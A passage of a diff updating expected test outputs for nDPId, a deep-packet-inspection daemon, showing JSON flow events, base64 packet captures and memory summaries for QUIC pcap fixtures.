{"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
-00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621516401935,"flow_last_seen":1621516402235,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"31.219.210.96","src_port":62719,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1621516405234,"flow_last_seen":1621516405464,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4050,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
-00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621516418245,"flow_last_seen":1621516418245,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"53.101.228.200","src_port":60919,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516733869,"flow_last_seen":1621516733869,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"144.237.113.58","src_port":50423,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"37b57e2a60f871d6f459268f91669a78","tls_supported_versions":"TLSv1.3"}} 
+00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621516418037,"flow_last_seen":1621516418037,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"7.71.118.27","src_port":57319,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621516392616,"flow_last_seen":1621516392956,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"126.3.93.89","src_port":50224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621516401935,"flow_last_seen":1621516402235,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"31.219.210.96","src_port":62719,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1621516405234,"flow_last_seen":1621516405464,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4050,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621516418245,"flow_last_seen":1621516418245,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"53.101.228.200","src_port":60919,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00609{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":179,"packets-processed":178,"total-skipped-flows":0,"total-l4-payload-len":240300,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":112,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":112,"total-idle-flows":111,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":520,"global_ts_msec":1621521142479} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621521142479,"flow_last_seen":1621521142479,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":59206,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1621521142479,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621521142479,"pkt":"AAAAAAAAAAEAS1QMCABFAAViSrhAAH4RDvqokEAFTOdoXOdGAbsFTt8wzP8AAB0IF8C5lRFZ4pEAAEU0ArfW5P1VplOmF6lJC6sD9FD5t7ksW3G6pIV+pxy8yJt6ChAKFxnQmbZIV9dRmn9\/GhICwwKjJ2FzV0KvCGLgZ6X+Mdfa6UbhiD5fnkjyzmiIAB9HARV9mwW0qWFR+1JZ0wBSXcVhsdD76Sf9pAJ1VTq0AAsSZXJGpY6+ga64ul50F4bjriucLzjYYNDw+HNSeQ06KntY3GZGimI9HLzbEr2ITrSYMZjOiiz48+8lDJD2UCwemzRbkRRjVcXHUb3Tc7AmoQBva7BoUSsAyx1+D5PZLPsFdXibn+bgqwT1LLMkHG9RRpo1Tt0gtl2pZ3bJxzRqJmP\/hGWMpoj6aUkAKucuXZomz1Q3f30mL0XyV\/0uY4\/XJg7V1OPue2C09RRuIDP1ooFtROu\/pDDI8HImrmKLKKL9dpKh9adfi5YYuPF4Is4HNqqqizalARCmdFSjpPpy98YfUSi2cVRDkchscThNdK38ko4V8Xy7wPkbIt0O9VavKfmHr39w5Ez1eaWFGZRrA0sn6GcPn8Dm2mBcIqBG5MQXN4W5fy1Y\/pT1svPFcC4q5\/EbD0QNn3Z9BNP8nBLiOsibf3MO3CFnOCJM1lkXUrVAGUZnjxGG+8QqLn4EDZelxu\/GTjx1L24MAsKjWwR\/o8CwEfewYTHjpSyuURWOKkKoimK1sbXS\/GUISZay6CW3ipWXDAWnzLjYcodUIMxsb6EXUcIWUdqRY3ypfHKYpkR2gJ8xECJ7AqLMiY6ZE2uxoDH2mplysDswerJmf0vlCYZjDi32D9NrSZoCZTUeWm4xfiTRs2WDrsd1DqSJwRmQac3\/k55LOe6c64B2i8EEyZy11iQXRTuxGAnfwPi7J2P7G5iOmklAoJzzL\/0e8gKlYQz1\/eyL8HHdtP9qbl5P1U5o8IfoTp\/dirgLtL\/sstyNOECz3S+ayZnviqEPhmw1cijJYWOrYO+8pc6zVY+d8ULBF\/1MP6ychzNJOS7uwIVz2UYuxjSek3ViUJolFI52vwDbTLtTK7tzBEeEdAEchicq0jw14m4HZ+e4tF+ukL7pInPzJ8wSVQteMvhcM05Lb5IMk0dp0n21Lhhxk4rfjW5o1Rx9yGagxsLW0M2mEMuP4yB02zIA7SbqYa7jGL8IZqDCmafSvYT3KeNsojBFm3l7E4ABP4OKSMnTDQnziym3spGoBu55cpHlCNnGIXsDXfxDbCuGO6UHeS1fMSqOZnhD\/oZDnP5dYfsIXucQnrcx7lxhddVt4WAUUkUstn0y6l\/ZI+n+V\/0pwNIHkKelqc8pvPNG+JI1PSwYT7AfrchIoFXExUQsiqKPMuonW36NpxM3LkCC\/aUwvKOHDe1CykT5CBTVTcvM6LiDoQeKOvHkAxU7lNkROINSK7LsZzcm53MqryrrO1UQHIMBmC2YTcM98zz7PGYSirT2iXt7W+8GhlTLOcB3tKQE+B8YL\/1\/AkWmWJZpkom5
dDgbzqOZa+I8DdrHM7ji5OZONbEY9iRhxqtTq74iTkjQ5ERERvH0t6mntYj+OqsnNsbFzFwalVuNQrhXP+gbh5zien4KTygiyFYCjV+NChiZy8pxs1wT4ESZqkuqAehNcFqGsDoVgPoQOLhzIn\/DzItGeAiDrfHRixyOVU1EWsb7b30saK+ncY8sFqQNqA5lAl9gdLvQcfuDvdrDHmseBNqFM+55fa677QDOLLZ\/8MAydrSpxVKh5KZf++uVTUj630nVHiL+6S9majjl00xS38l2C9stuZ3K6Kgv+3rXBnYm4l74dpkK"} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621521142479,"flow_last_seen":1621521142479,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":59206,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ogs.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 6.1","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621521142479,"flow_last_seen":1621521142479,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":59206,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
-00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621516733869,"flow_last_seen":1621516733869,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"144.237.113.58","src_port":50423,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621521142479,"flow_last_seen":1621521142479,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":59206,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ogs.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 6.1","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 
+00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621521142479,"flow_last_seen":1621521142479,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":59206,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621516733869,"flow_last_seen":1621516733869,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"144.237.113.58","src_port":50423,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
00611{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":179,"packets-processed":179,"total-skipped-flows":0,"total-l4-payload-len":241650,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":113,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":113,"total-idle-flows":113,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":526,"global_ts_msec":1621521142479} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 179/179 @@ -532,9 +532,9 @@ ~~ total active/idle flows...: 113/113 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 7685036 bytes -~~ total memory freed........: 7685036 bytes -~~ total allocations/frees...: 121449/121449 +~~ total memory allocated....: 7818670 bytes +~~ total memory freed........: 7818670 bytes +~~ total allocations/frees...: 124211/124211 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 506 chars ~~ json string max len.......: 2328 chars diff --git a/test/results/quic_interop_V.pcapng.out b/test/results/quic_interop_V.pcapng.out index 0d4fb8c75..815ba3017 100644 --- a/test/results/quic_interop_V.pcapng.out +++ b/test/results/quic_interop_V.pcapng.out 
@@ -2,275 +2,275 @@ 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_interop_V.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1603816434507} 00637{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02156{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1603816434507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434507,"pkt":"pJGxgjQ5PKn0qB\/sht1gCq04BNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUlL0BuwTYjlPGCgoKCgjBjvWe+MPFRAAARL4AnyCwAgoQjL1g+KDURvDYeEyLw\/xCRk6Dll3vQteHoVQFBQKAtW3\/PUJKxA75UMcNXhZUvkOXlYopsWey\/u66wX35Pj6pU3CXAqQ3fDp5zyCvr8Pm5AyoNAx0veCSUQeDBYfIgnerrrO2MEGoBqYPiiUt8xe5+r79P3P4ZzDRVupqGycbUWtQ6Wo6aZSD05slEqoyPBAaLp3YhydnPgb7vRWFjq0SdM0H\/zxBdY7aJ5VQRGeFUx984uZ\/K6yeMGPT3JYsoR6JIONmbNNldMQuEP+a7GBJ3iEWFJ1Nkel3g0iBwZRA7TTHinpesR5BAPJGKsJg\/VS2BeEVhnsQklM+ccg8cEJ\/WZ8KGZKu2b5eb3vaAvV55IOI0J2iO5UmLyQCl7SbwQC4xeRqoU1X\/r4ksMW+JxOVqFoTOp0p9K8G2C+kXU7PkGNUF6LWJgz0gBnPUfLEiLYep+IB3ydQMSXFv2q4ljMWpImZsfM1M1hyBHVdutiac3ctGpn70sK96\/GuFpnGs5SaPUZPVAd6cowQNyios9VD7LJHBycvPPV\/FVVqGKmtlmE1jhqYU8WM3TP2hIDFKj\/VkbTWINB6wKhdoTjaE++G5UWOW3DyJNvkrdNQDmb57TWpCvvDwZ0zyc9+kjM1P8gJU7fxklAOWt77tLOKjqKz2yyGTywbYI8fpyDxuwcOqHHM1p9Qo2bUMzUDDc5AgR5XXK8f98\/2k\/szEHoOj+xZ0LAk\/ktl3\/tNcCYf5NwDCkoJ2SA+A3liVp\/z86DQ\/o9ZPBbnT\/MRpriiusVj\/+7dyNzTUlosBxg\/ZTGIAFG9kkbqpmlXa9h8whQ+M5AjGTQXahgxhUg+T+XkcD3\/AwAskzg7QFF8QOQvTkgKR27pnPB9TcW0ov3zRKBSq2IRQasfzD4018QjLIoL6M1i7zKWOriPXhrbpQCBMed+qy0CCutCqcHfM5C6tdP5yjdd03xLltagPaoEJdMAzkTI4GTxawZxV\/nJEB2CpfHpXBAiLmSF3pSqQkOlK3gecF6Z5kJRZxdfHFiYQc+ZeBxM3ZsG9j3S6poeVhWhKtKijv579ezhO7g3QE97akiUNAtC\/9u96VNcgwwZo3pYzoh+bmR12ZZk\/flZDnZgzTtqeO5zikP6EaDg3xt4ZqzYpvmcwxx5bFkZ6tYCa\/WSn2OsS\/V89R9JkA+p04smS\/E7zSLxIHIjg7ziPRYLmF24dGHz34FZmheQHZ\/4gm1aFmIaG6\/7f5wmQDqHrB8QpqkJoLkDgUUHwTgyqeLrCOeAdu2eQCQJ4129kNDhXnJ7gWkCKO71EQxgH1wOzb5+V8dr\/jGNAAVFaptYOiLQes+Et0OXv\/4vGauirP+hYZEEAR3InBIIg\/L5KPxSdMCpSCm\/3UnE1zUNlTk7El74hPsNYUcmUS+usyw22jx+xLs4q3Kod9YDt4DrToci+qgaxSPs+xB3bX18DBMD
yb8wNM5xFrlJXeWv7YCCDubwS+dnWseGEwnfJTp8dJgKhqy8jDuI7wNl1iTi5TWAuubz7G08V4L8udRmpqYJpILlauSw+hHEcI8MkM2s5oZz8Vly\/UrbvRIh+SQjHV9IgfXMkwlUO3sEi\/jyMwMDaEUvpg=="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1603816434507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434507,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA0WRAAEARMO3AqAGAR8opqZMLAbsE7E3SzgoKCgoINqH1Vk80LhQAAETSZtRDhHpK7xsUlJpSgtMoVla6Pas+BpVtN5Gjcd3BxSuPRtpK\/YBMJ9l2k8o2HThiUM\/fvgYuD2Kcrxorh\/jnb6Z8yLwnCqMFI6f5++2wq3UD\/j8Rm4jH0vTA53TCV8faPBmIbc\/\/f3Tz+R2DOXZgP62iVOiBptLL3IqVZOU4IOLE0\/JVkynYUJQnG0YsW4UK0qnbcWTyRdgTGBkMmMCcy0t6nX6Tgq0WiglTiACb2fNGAUM5xWmIp7l56ox3rxd5eSC\/ouvINjM5kG8P8v2tSujZgl86FeLWEME+DY5WH6KcXkEbr69+FbbuNXvDK2f590+AqasG+fI7zBfNWo1Ipsj7l1HkYvsUvIcw26BBQurqx8+tF7QthbMubN0aD8OhoOBolJfSbDzAs85Id6ivSBG9R0jYEyc3k1vljfz+fMsTaJHmT507adZ2GD7mZXjlqTo2tY0lxTmDq8TYIRmW5S0g5AxeLYESawu5tcDeQ1F0ZZz\/81pFA\/O6Xsz+LW+nkuPcxb3FhZQ8rGk11Nxnt5bl3qx9dkKg50nnHBStrKL99IkvRWEio2XD6zIDHeUPmuj6vbPMoqWbJ1BWc1QOP8zvT\/5Lum0urlm+3xs84QGqHVu2D75cOuwNNgNZCk5Ju4VXwD1CjjYHIrh0EPYz\/YpjMoCs1JdYRQApUEYvXPrOftFHyRWo2ChQb33MFXFQcv8wO2\/5aJKqYdcVeht\/\/qNdSsRFnrxK6h2aWdAQ4Z7JbsFvA\/hTb+VL5L9GCSqVojyjcvz6pXj+7VmERo1L+Pa9BRifjy0iLNfjP5wofltooS4BlzdCB4aUHHGlTH+J7RtfENSes5C1MkGk3bXd4a77aCZrF2RKt65BuGoTHxCIa46j\/b1GLm8VZzlNV59q4blAc5XL98HTR
